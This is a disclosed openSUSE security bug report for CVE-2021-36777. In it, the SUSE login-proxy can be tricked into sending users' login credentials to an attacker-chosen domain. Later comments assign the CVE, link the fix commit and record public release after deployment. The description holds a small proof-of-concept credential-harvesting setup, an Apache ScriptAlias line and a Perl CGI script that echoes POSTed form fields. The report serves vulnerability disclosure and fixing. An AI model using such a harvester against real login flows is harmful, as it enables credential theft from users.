Bug 1191209 - (CVE-2021-36777) VUL-0: CVE-2021-36777: login-proxy sends password to attacker-provided domain
VUL-0: CVE-2021-36777: login-proxy sends password to attacker-provided domain
Classification: openSUSE
Product: openSUSE.org
Classification: openSUSE
Component: BuildService
Other Other
: P3 - Medium : Major (vote)
: ---
Assigned To: Marcus Rückert
Adrian Schröter
Depends on:
  Show dependency treegraph
Reported: 2021-10-01 08:01 UTC by Bernhard Wiedemann
Modified: 2022-02-23 09:55 UTC (History)
6 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Bernhard Wiedemann 2021-10-01 08:01:27 UTC
When authenticating various SUSE and openSUSE services, we use a login-proxy
so that the services themselves do not get to see user passwords.

Today, tiggered by darix and Victor Pereira, I investigated issues about redirecting to attacker-provided URLs.
I found that the login-proxy can send the credentials (filled by users into the login form) to an attacker-provided server.

Example attack URL:

On the server side is an apache
(with a valid SSL cert for https) with a config line
ScriptAlias /ICSLogin/auth-up /usr/lib/cgi-bin/testpost
pointing to this script  
#!/usr/bin/perl -w
use strict;
use CGI ":standard";
print header("text/plain");
        print "\n\nPOST params:\n";
        foreach(param()) {
                print "$_=".param($_)."\n";

also affected:

not affected:
Comment 1 Johannes Segitz 2021-10-01 08:06:42 UTC
Please use CVE-2021-36777 for this
Comment 3 Marcus Rückert 2021-10-06 11:22:17 UTC
The appliance is not affected. the proxy code is only used on our infra.

the bad part that allowed affecting the form via url param is already patched out. the general removal of the url param needs testing.
Comment 4 Bernhard Wiedemann 2021-10-08 02:05:51 UTC
https://gitlab.suse.de/buildops/login-proxy-scripts/-/commit/d0b45f98fc74b254ee0585f26647cb6c8d2c871f by darix fixed this CVE-2021-36777
Comment 6 Johannes Segitz 2022-02-23 09:55:45 UTC
making public. Fix is available and deployed